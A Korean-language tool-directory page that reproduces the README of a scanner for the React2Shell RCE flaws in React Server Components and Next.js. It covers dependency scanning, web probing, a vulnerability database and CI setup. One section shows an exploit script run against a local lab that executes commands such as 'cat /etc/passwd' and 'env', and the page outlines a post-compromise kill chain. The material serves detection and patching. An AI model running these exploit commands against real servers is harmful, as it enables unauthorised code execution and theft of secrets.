Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
react2shell-scanner-rce-react-next-CVE-2025-55182-CVE-2025-66478 — CVE-2025-55182 (React) 및 CVE-2025-66478 (Next.js)를 위한 스캐너 - react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack 및 Next.js와 같은 RSC 지원 프레임워크에 영향을 미치는 심각한 React Server Components(RSC)/Flight 프로토콜 취약점 캠페인을 추적하고 수정합니다. | Kitploit
도구/GitHubGitHub/security-phoenix-demo/react2shell-scanner-rce-react-next-cve-2025-55182-cve-2025-66478
Vulnerability ScannersWeb Vulnerability ScannersCode AnalysisExploitationWeb SecurityPenetration TestingSupply Chain SecurityLearning & EducationLabs & Practice
GitHubsecurity-phoenix-demo/react2shell-scanner-rce-react-next-cve-2025-55182-cve-2025-66478

react2shell-scanner-rce-react-next-CVE-2025-55182-CVE-2025-66478

CVE-2025-55182 (React) 및 CVE-2025-66478 (Next.js)를 위한 스캐너 - react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack 및 Next.js와 같은 RSC 지원 프레임워크에 영향을 미치는 심각한 React Server Components(RSC)/Flight 프로토콜 취약점 캠페인을 추적하고 수정합니다.

저장소 보기
6346개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🔍 Phoenix SCA Scanner - Universal - CVE-2025-55182-CVE-2025-66478 React 및 Nexus 취약점 대응 버전

React2Shell 버그 클래스에 대한 외부 취약점: React Server Components (RSC) "Flight" 프로토콜에서 최근 공개된 두 가지 인증되지 않은 원격 코드 실행 취약점 — CVE-2025-55182 (React) 및 CVE-2025-66478 (Next.js) 로, 둘 다 CVSS 10.0 등급입니다. 이 문제는 RSC/Server Function 엔드포인트가 공격자가 제어하는 Flight 페이로드를 디코딩하는 방식에 존재하며, 단일 조작된 HTTP 요청을 통해 잠재적인 서버 측 코드 실행으로 이어집니다. 이는 App Router 및 프로덕션 빌드를 사용하는 최신 React/Next.js 스택에서도 마찬가지입니다. 많은 팀에게는 "지금 패치하고, 노출을 확인한 후, 감사"해야 하는 순간이지, 나중에 종속성 위생 스프린트로 미룰 일이 아닙니다. LAB 폴더에는 React2Shell에 대한 익스플로잇 및 실습 취약점이 포함되어 있습니다.

이 프로젝트는 두 가지 접근 방식을 제공합니다: (1) 소프트웨어 구성/종속성 위험 스캔(이 도구)을 통해 취약한 라이브러리와 버전을 신속하게 찾고, (2) 웹 DAST 스캐너( React2Shell Web Scanner )가 외부에서 RSC/Flight 엔드포인트를 능동적으로 탐색하여 실행 환경에서 악용 가능한 경로에 도달할 수 있는지 검증합니다. 이 두 가지를 함께 사용하면 "취약한 구성 요소는 어디에 있는가?" 와 "프로덕션에서 실제로 악용될 수 있는 곳은 어디인가?" 라는 질문에 답할 수 있으므로 패치, 강화 및 사고 대응의 우선순위를 자신 있게 정할 수 있습니다.


🌐 웹 스캐너 - React2Shell RCE 탐지

실시간 엔드포인트 테스트 및 RCE 검증을 위해서는 전용 웹 스캐너를 참조하십시오:

📁 web-scan_CVE-2025-66478/ - 전체 문서 및 가이드

웹 스캐너 빠른 시작

root@kitploit:~
cd web-scan_CVE-2025-66478

# 종속성 설치
pip install -r requirements.txt

# 단일 대상 스캔
python3 react2shell-scanner -u https://target.com -v

# 증거 표시와 함께 스캔
python3 react2shell-scanner -u https://target.com --show-evidence

# 모든 내보내기 형식과 함께 배치 스캔
python3 react2shell-scanner -l targets.txt -o results.json --csv results.csv --html report.html

# 취약한 대상에서 익스플로잇 테스트 (Python 3.11+ 필요)
python3.11 test-lab/exploit.py -u http://vulnerable-host:3000 -c "hostname"

웹 스캐너 기능

기능설명
🔍 RCE 탐지산술 기반 안전 탐지 (부작용 없음)
🎯 기술 지문 감지Next.js/React 애플리케이션 자동 감지
📊 다중 형식 내보내기JSON, CSV, HTML 보고서
🔗 IOC 연관성31개 이상의 알려진 악성 IP와 매칭
🌐 대규모 스캔CIDR 범위, 서브도메인 열거
☁️ Phoenix 통합발견 결과를 Phoenix Security에 업로드
💻 익스플로잇 도구취약한 대상에서 명령 실행

테스트 랩 설정

root@kitploit:~
cd web-scan_CVE-2025-66478/test-lab/lab

# 취약한 인스턴스(3011) 및 패치된 인스턴스(3012) 시작
docker-compose up -d

# 취약한 인스턴스 테스트
python3 react2shell-scanner -u http://localhost:3011 --show-evidence

익스플로잇 예제 (Python 3.11+ 필요)

root@kitploit:~
cd web-scan_CVE-2025-66478/test-lab

# 익스플로잇 종속성 설치
pip3.11 install -r requirements.txt

# 기본 명령 실행
python3.11 exploit.py -u http://localhost:3011 -c "whoami"
# 출력: nextjs

python3.11 exploit.py -u http://localhost:3011 -c "id"
# 출력: uid=1001(nextjs) gid=65533(nogroup)

python3.11 exploit.py -u http://localhost:3011 -c "hostname"  
# 출력: 99e28775bf80 (컨테이너 ID)

# 시스템 정보 수집
python3.11 exploit.py -u http://localhost:3011 -c "uname -a"
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/passwd"
python3.11 exploit.py -u http://localhost:3011 -c "env"

# 애플리케이션 정찰
python3.11 exploit.py -u http://localhost:3011 -c "pwd"           # /app
python3.11 exploit.py -u http://localhost:3011 -c "ls -la"
python3.11 exploit.py -u http://localhost:3011 -c "cat package.json"
python3.11 exploit.py -u http://localhost:3011 -c "node --version"

🛡 React2Shell / Flight 프로토콜 RCE – 취약점 개요

React2Shell은 React Server Components (RSC) 페이로드를 Flight 프로토콜에서 처리할 때 발생하는 인증되지 않은 원격 코드 실행 원시 기술입니다. 실제로는 악의적인 클라이언트가 단일 조작된 HTTP 요청을 RSC/Server Function 엔드포인트로 전송하고, 취약한 버전이 사용 중인 경우 "웹 앱"을 "서버 셸"로 바꿀 수 있습니다.

높은 수준에서:

  • 공격자가 제어하는 Flight 페이로드가 RSC/Server Function 처리와 관련된 엔드포인트(예: Next.js App Router 배포)로 전송됩니다.
  • 서버는 React의 Flight 디코딩 및 역직렬화 로직을 사용하여 해당 페이로드를 서버 측 데이터 및 명령어로 다시 변환합니다.
  • 이 계층에서의 안전하지 않은 역직렬화는 공격자가 서버 측 실행에 영향을 미칠 수 있도록 하여 완전한 원격 코드 실행(RCE) 으로 확대됩니다.

이는 인증되지 않은 RCE이므로 기본 프로덕션 설정도 범위에 포함됩니다. "서버 함수"를 명시적으로 작성하지 않았고 단순히 최신 React/Next.js 패턴을 채택한 경우에도 마찬가지입니다. 호스팅 수준의 완화 조치와 일반 WAF는 기본 안전망으로 취급해서는 안 됩니다. 노출을 줄일 수 있지만 취약한 라이브러리를 안정적으로 보완하지는 않습니다. 이를 사고로 처리하십시오:

  • 패치 React RSC 서버 DOM 패키지 및 Next.js를 수정된 릴리스로 업데이트합니다.
  • 노출 확인 코드베이스와 SBOM을 스캔하여 취약한 버전을 찾습니다.
  • 감사 RSC/Flight 관련 엔드포인트에 대한 의심스러운 요청을 로그에서 확인하고, 침해가 의심되는 경우 비밀을 교체합니다.

공격자가 React2Shell을 통해 RCE를 획득하면, 방어자는 익숙한 킬 체인을 가정해야 합니다:

  • 환경 탐색 – 런타임, 파일 시스템 레이아웃, 환경 변수 및 클라우드 메타데이터 엔드포인트 열거.
  • 비밀 사냥 – .env 파일, 배포 비밀, CI 토큰, 서비스 자격 증명 및 서명 키 수집.
  • 지속성 유지 – 웹셸과 유사한 아티팩트 배치, 서버 측 코드 수정 또는 가능한 경우 예약된 작업 설치.
  • 수평 이동 – 내부 서비스, 데이터베이스, 큐 및 클라우드 관리 API로 피벗.
  • 공급망 후속 공격 – 빌드 또는 배포 자격 증명이 있는 경우 CI/CD 및 아티팩트 레지스트리로 "상류" 이동.

DevSecOps 파이프라인이 전통적으로 웹 계층을 "단순한 프론트엔드"로 취급해 왔다면, 이 취약점은 RSC 및 스트리밍 의미론이 관련될 때 프론트엔드 프레임워크가 깊은 서버 측 폭발 반경을 가질 수 있음을 구체적으로 보여줍니다. Universal Vulnerability Scanner는 "취약한 패키지를 어디에서 실행하고 있습니까?"라는 질문에 신속하게 답하고, 그 답을 Phoenix 기반 캠페인 및 곧 제공될 실시간 RSC 엔드포인트에 대한 웹 DAST 검증에 공급할 수 있도록 존재합니다.

🎯 기능

SCA 스캐너 (이 도구)

  • ✅ 다중 생태계 지원 - NPM (PyPI, Ruby Gems 등으로 확장 가능)
  • ✅ 지능형 버전 매칭 - 범위 기반 탐지를 포함한 Semver 파싱
  • ✅ React Server Components (RSC) 탐지 - RSC 취약점 전용 탐지
  • ✅ 잠금 파일 지원 - package-lock.json, yarn.lock, pnpm-lock.yaml 파싱
  • ✅ Phoenix 통합 - 발견 결과를 Phoenix Security 플랫폼에 업로드
  • ✅ 종합 테스트 - 검증을 위한 샘플 취약 패키지 제공
  • ✅ JSON/텍스트 보고서 - 유연한 출력 형식
  • ✅ CLI 인터페이스 - 사용하기 쉬운 명령줄 도구

웹 스캐너 (web-scan_CVE-2025-66478/)

  • ✅ 실시간 RCE 탐지 - 안전한 산술 기반 취약점 확인
  • ✅ 익스플로잇 도구 - 취약한 대상에서 명령 실행
  • ✅ IOC 데이터베이스 - 31개 이상의 악성 IP, 16개 이상의 공격 패턴
  • ✅ 대규모 스캔 - CIDR 범위, 서브도메인 열거, 배치 스캔
  • ✅ 증거 수집 - 전체 요청/응답 캡처, HTML 보고서
  • ✅ 테스트 랩 - Docker 기반 취약/패치 환경

📦 설치

root@kitploit:~
# 종속성 설치
pip install -r requirements.txt

# 프로젝트 루트에서 실행
python -m universal_vulnerability_scanner.main --help

🚀 빠른 시작

1. 프로젝트 스캔

root@kitploit:~
# 기본 스캔
python -m universal_vulnerability_scanner.main scan /path/to/project

# JSON 출력
python -m universal_vulnerability_scanner.main scan /path/to/project --json --output results.json

# 자동 모드 (요약만 표시)
python -m universal_vulnerability_scanner.main scan /path/to/project --quiet

2. Phoenix Security에 업로드

root@kitploit:~
# Phoenix 구성 템플릿 생성
python -m universal_vulnerability_scanner.main create-config

# .phoenix.config를 자격 증명으로 편집
# 그런 다음 스캔 및 업로드
python -m universal_vulnerability_scanner.main scan /path/to/project --upload-phoenix

3. 테스트 실행

root@kitploit:~
# 포함된 취약 샘플로 테스트
python -m universal_vulnerability_scanner.main test

📋 취약점 데이터베이스

스캐너는 다음 위치에 있는 JSON 기반 취약점 데이터베이스를 사용합니다:

root@kitploit:~
universal_vulnerability_scanner/data/vulnerability_database.json

지원되는 취약점

React Server Components (RSC)

  • react-server-dom-webpack - 버전: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel - 버전: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack - 버전: 19.0.0, 19.1.0, 19.1.1, 19.2.0

React 핵심

  • react - 취약 범위: [19.0.0, 19.0.1), [19.1.0, 19.1.2), [19.2.0, 19.2.1)
  • react-dom - react와 동일한 취약 범위

Next.js

  • next - 취약 범위: [15.0.0, 15.0.5), [16.0.0, 16.0.7)

데이터베이스 형식

root@kitploit:~
{
  "metadata": {
    "version": "1.0.0",
    "last_update": "2025-12-04",
    "ecosystems": ["npm"]
  },
  "vulnerabilities": {
    "npm": {
      "package-name": {
        "exact_versions": ["1.0.0", "1.0.1"],
        "vulnerable_ranges": [
          {"min": "1.0.0", "max": "1.0.2", "severity": "CRITICAL"}
        ],
        "safe_versions": ["1.0.2+"],
        "cve_ids": ["CVE-2025-XXXX"],
        "description": "취약점 설명",
        "references": ["https://..."]
      }
    }
  }
}

🔧 구성

Phoenix Security 통합

.phoenix.config 생성:

root@kitploit:~
[phoenix]
client_id = your_client_id_here
client_secret = your_client_secret_here
api_base_url = https://api.securityphoenix.cloud
assessment_name = Universal Vulnerability Scanner - RSC Detection
import_type = new

또는 환경 변수 사용:

root@kitploit:~
export PHOENIX_CLIENT_ID="your_client_id"
export PHOENIX_CLIENT_SECRET="your_client_secret"
export PHOENIX_API_URL="https://api.securityphoenix.cloud"

📊 출력 형식

텍스트 보고서

root@kitploit:~
================================================================================
UNIVERSAL VULNERABILITY SCANNER REPORT
================================================================================
Scan completed: 2025-12-04 10:30:00

SUMMARY:
----------------------------------------
Total findings: 12
  VULNERABLE:  3
  SAFE:        2
  CLEAN:       5
  REVIEW:      2

🚨 VULNERABLE PACKAGES DETECTED
================================================================================

1. [email protected]
   File: /path/to/project/package.json
   Reason: Exact match with known vulnerable version 19.0.0
   ✅ Safe version: 18.99.99
   CVE: CVE-2025-RSC-001

JSON 보고서

root@kitploit:~
[
  {
    "path": "/path/to/project/package.json",
    "kind": "package.json",
    "package": "react-server-dom-webpack",
    "version": "19.0.0",
    "verdict": "VULNERABLE",
    "reason": "Exact match with known vulnerable version 19.0.0",
    "severity": "CRITICAL",
    "vulnerable_versions": ["19.0.0", "19.1.0", "19.1.1", "19.2.0"],
    "safe_version": "18.99.99",
    "cve_ids": ["CVE-2025-RSC-001"],
    "timestamp": "2025-12-04T10:30:00"
  }
]

🧪 테스트 샘플

스캐너는 test_samples/에 포괄적인 테스트 샘플을 포함합니다:

테스트 케이스설명예상 결과
rsc_vulnerable_exact/정확한 취약 버전4 VULNERABLE
rsc_vulnerable_range/버전 범위4 VULNERABLE
rsc_safe_versions/패치된 안전 버전6 SAFE
rsc_mixed/취약/안전/클린 혼합2 VULNERABLE, 1 SAFE, 4 CLEAN
rsc_with_lockfile/잠금 파일 파싱2 VULNERABLE, 1 CLEAN

테스트 실행:

root@kitploit:~
python -m universal_vulnerability_scanner.main test

🏗️ 아키텍처

root@kitploit:~
universal_vulnerability_scanner/
├── core/
│   └── version_parser.py       # Semver 파싱 및 비교
├── models/
│   ├── finding.py              # 발견 데이터 모델
│   └── vulnerability.py        # 취약점 데이터베이스 모델
├── scanners/
│   ├── base_scanner.py         # 추상 스캐너 인터페이스
│   └── npm_scanner.py          # NPM 생태계 스캐너
├── integrations/
│   └── phoenix_uploader.py     # Phoenix API 클라이언트
├── data/
│   └── vulnerability_database.json  # 취약점 정의
├── test_samples/               # 테스트 케이스
└── main.py                     # CLI 진입점

🔐 보안 고려 사항

  1. 오탐 없음: 스캐너는 안전 쪽으로 오류를 범합니다.
  2. 버전 정규화: NPM 버전 지정자(^, ~, =) 처리
  3. 범위 탐지: 버전 범위 내 취약점 탐지
  4. 잠금 파일 우선: 잠금 파일에서 확인된 버전 선호
  5. 안전 버전 권장: 업그레이드 경로 제안

🚀 스캐너 확장

새 생태계 추가

  1. BaseScanner를 상속하는 새 스캐너를 scanners/에 생성
  2. 생태계별 파싱 구현
  3. 새 생태계 키 아래 데이터베이스에 취약점 추가

예시:

root@kitploit:~
from .base_scanner import BaseScanner

class PyPIScanner(BaseScanner):
    def _get_ecosystem(self) -> str:
        return "pypi"
    
    def scan_path(self, root: Path) -> List[Finding]:
        # PyPI 스캔 로직 구현
        pass

새 취약점 추가

data/vulnerability_database.json 편집:

root@kitploit:~
{
  "npm": {
    "new-vulnerable-package": {
      "exact_versions": ["1.0.0"],
      "vulnerable_ranges": [{"min": "1.0.0", "max": "1.0.5", "severity": "HIGH"}],
      "safe_versions": ["1.0.5+"],
      "cve_ids": ["CVE-2025-XXXX"],
      "description": "취약점 설명"
    }
  }
}

📈 종료 코드

  • 0 - 스캔 성공, 취약점 없음
  • 1 - 스캔 성공, 취약점 발견됨
  • 2 - 스캔 실패 (잘못된 입력, 데이터베이스 오류 등)

🤝 기존 시스템과의 통합

Phoenix Security 플랫폼

자동으로 발견 결과를 Phoenix에 업로드합니다:

  • 스캔된 저장소별 자산 생성
  • CVSS 점수가 포함된 취약점 발견
  • 분류를 위한 태그
  • CVE 참조

CI/CD 파이프라인

root@kitploit:~
# 예시 GitHub Actions
- name: Vulnerability Scan
  run: |
    python -m universal_vulnerability_scanner.main scan . --json --output scan-results.json
    
- name: Upload to Phoenix
  if: always()
  run: |
    python -m universal_vulnerability_scanner.main scan . --upload-phoenix

📝 변경 로그

v1.0.0 (2025-12-04)

  • 최초 릴리스
  • 잠금 파일 지원을 포함한 NPM 스캐너
  • React Server Components 취약점 탐지
  • Phoenix Security 통합
  • 포괄적인 테스트 스위트

🙏 감사의 말

  • Semver 파싱은 react/rsc_exposure_scanner.py에서 적용
  • Phoenix 통합은 enhanced_npm_compromise_detector_phoenix.py에서 적용
  • 포괄적인 공급망 보안을 위해 구축됨

📄 라이선스

Shai Halud 보안 툴킷의 일부입니다.


🔍 안전하게 유지하세요! 취약점은 책임감 있게 보고하십시오.

도구 다운로드